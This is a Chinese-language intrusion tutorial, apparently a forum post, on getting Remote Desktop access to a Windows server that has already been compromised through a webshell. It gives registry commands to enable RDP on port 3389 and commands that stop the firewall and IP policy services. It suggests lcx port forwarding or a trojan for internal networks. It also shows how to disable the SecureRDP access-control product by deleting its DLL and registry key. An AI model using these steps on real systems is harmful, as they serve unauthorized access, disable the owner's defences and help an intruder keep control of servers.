1、最經常出現的3389端口沒開。
怎么看端口開沒開呢。最簡單的辦法是netstat -an 查看是不是有127.0.0.1:3389有這行。如果有表示開已經開放了 木有的話就表示木有開放3389終端端口(PS:這樣看的前提是管理員沒有很賤的修改掉終端端口。)
第二種查看是基於命令行的。我很喜歡這種方式。
reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
上個圖
未命名1.jpg
大家主要注意倒數第二行就好了。 PortNumber REG_DWORD 0xd3d
大概意思就是終端端口為d3d (ps: 0xd3d前面的0x是16進制表示 d3d 經過16進制轉換=3389)
這樣在通過上面的方法就可以查看是否開啟了終端端口了。
不過如果有webshell並支持各種組件直接讀取注冊表就行了。
解決辦法:
dos下一句話開啟3389,不用重啟,測試過XP和2003…dos下一句話開啟3389,不用重啟,測試過XP和2003…
開啟3389
REG
ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
查看遠程終端
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal” "Server\WinStations\RDP-Tcp /v PortNumber
2、IP策略和防火牆的阻攔(一般管理員都會設置下的。)
解決辦法 :禁用服務
net stop sharedaccess
net stop policyagent
搞定
3、內網
內網只能lcx或者運行木馬了。 個人比較我比較喜歡第二種。
4、其他各種軟件各種防火牆控制
舉個例子。前幾天遇到的。
secureRDP防火牆 尼瑪各種限制 連接3389甚至可以精確到限制主機名、ip、iP段、MAC地址等等。
突破secureRDP的方法。
刪掉wtsfilter.dll 刪掉注冊表鍵值 HKEY_LOCAL_MACHINE/SOFTWARE/Terminalsoft/WTSFilter 或者ren改掉WTSFilter的名字
刪除的方法:echo y | reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Terminalsoft\WTSFilter 這個方便直接 推薦
如何用CMD開啟3389與查看3389端口
開啟
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
查端口
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber